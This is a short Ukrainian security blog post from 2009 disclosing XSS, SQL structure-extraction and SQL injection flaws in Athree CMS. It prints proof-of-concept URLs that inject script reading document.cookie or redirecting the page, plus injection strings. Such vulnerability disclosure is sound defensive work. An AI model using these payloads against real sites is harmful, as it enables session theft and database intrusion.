Websecurity - Веб безпека

05.11.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Раніше я вже писав про уразливості в Athree CMS.

Детальна інформація про уразливості з’явиться пізніше.

30.12.2009

XSS:

http://site/?p=1;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?p=1;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
http://site/?p=1;c=0/*%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E;s=28

SQL DB Structure Extraction:

http://site/?p=1;a=1′

SQL Injection:

http://site/?p=1;a=version()

This entry was posted on 19:38 30.12.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.